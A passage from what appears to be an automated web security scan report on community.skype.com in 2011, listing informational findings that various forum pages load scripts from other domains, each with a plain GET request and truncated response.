User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:21 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 191535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.182. http://community.skype.com/t5/Security-Privacy-Trust-and/Account-blocked/m-p/133890  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Security-Privacy-Trust-and/Account-blocked/m-p/133890

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Security-Privacy-Trust-and/Account-blocked/m-p/133890 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 63715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.183. http://community.skype.com/t5/Security-Privacy-Trust-and/bd-p/Security_and_Privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Security-Privacy-Trust-and/bd-p/Security_and_Privacy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Security-Privacy-Trust-and/bd-p/Security_and_Privacy HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 205576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.184. http://community.skype.com/t5/Skype-5-3-Beta-for-Mac/How-to-change-langue/m-p/132756  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-5-3-Beta-for-Mac/How-to-change-langue/m-p/132756

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-5-3-Beta-for-Mac/How-to-change-langue/m-p/132756 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:32 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 64283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.185. http://community.skype.com/t5/Skype-5-3-Beta-for-Mac/bd-p/mac53  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-5-3-Beta-for-Mac/bd-p/mac53

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-5-3-Beta-for-Mac/bd-p/mac53 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:30 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 149014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/AA2312F60BA29D0BF8D88F1980CD8BE6/lia-scripts-body-min.js"></script>
...[SNIP]...

18.186. http://community.skype.com/t5/Skype-Community/bd-p/it_community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-Community/bd-p/it_community

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-Community/bd-p/it_community HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:17 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 162743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.187. http://community.skype.com/t5/Skype-Connect/How-to-logout-from-facebook-account/m-p/133972  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-Connect/How-to-logout-from-facebook-account/m-p/133972

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-Connect/How-to-logout-from-facebook-account/m-p/133972 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:21 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 84698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.188. http://community.skype.com/t5/Skype-Connect/bd-p/Skype_Connect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-Connect/bd-p/Skype_Connect

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-Connect/bd-p/Skype_Connect HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:20 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 182353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.189. http://community.skype.com/t5/Skype-Garage/ct-p/Skype_Garage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-Garage/ct-p/Skype_Garage

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-Garage/ct-p/Skype_Garage HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:24 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 123010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.190. http://community.skype.com/t5/Skype-Manager/bd-p/Skype_Manager  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-Manager/bd-p/Skype_Manager

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-Manager/bd-p/Skype_Manager HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:23 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 193196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.191. http://community.skype.com/t5/Skype-Manager/deleting-an-older-account/m-p/133288  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-Manager/deleting-an-older-account/m-p/133288

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-Manager/deleting-an-older-account/m-p/133288 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:23 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 83430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.192. http://community.skype.com/t5/Skype-To-Go/Skype-to-Go-Numbers-always-busy/m-p/133620  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-To-Go/Skype-to-Go-Numbers-always-busy/m-p/133620

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-To-Go/Skype-to-Go-Numbers-always-busy/m-p/133620 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:09 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 213751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.193. http://community.skype.com/t5/Skype-To-Go/bd-p/Skype_To_Go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-To-Go/bd-p/Skype_To_Go

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-To-Go/bd-p/Skype_To_Go HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:08 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 184707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.194. http://community.skype.com/t5/Skype-WiFi/Error-Message-quot-Cannot-connect-to-Skype-quot/m-p/132964  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-WiFi/Error-Message-quot-Cannot-connect-to-Skype-quot/m-p/132964

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-WiFi/Error-Message-quot-Cannot-connect-to-Skype-quot/m-p/132964 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:10 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 105984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js"></script>
...[SNIP]...

18.195. http://community.skype.com/t5/Skype-WiFi/bd-p/Skype_Access  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-WiFi/bd-p/Skype_Access

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-WiFi/bd-p/Skype_Access HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:09 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 180981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.196. http://community.skype.com/t5/Skype-auf-dem-Computer/ct-p/de_computer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-auf-dem-Computer/ct-p/de_computer

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-auf-dem-Computer/ct-p/de_computer HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:58 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 123217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A51D2FF9D3602A82D2C7C7DA266FE521/lia-scripts-body-min.js"></script>
...[SNIP]...

18.197. http://community.skype.com/t5/Skype-for-Business/bd-p/pt_business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-for-Business/bd-p/pt_business

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Skype-for-Business/bd-p/pt_business HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:19 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 65254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
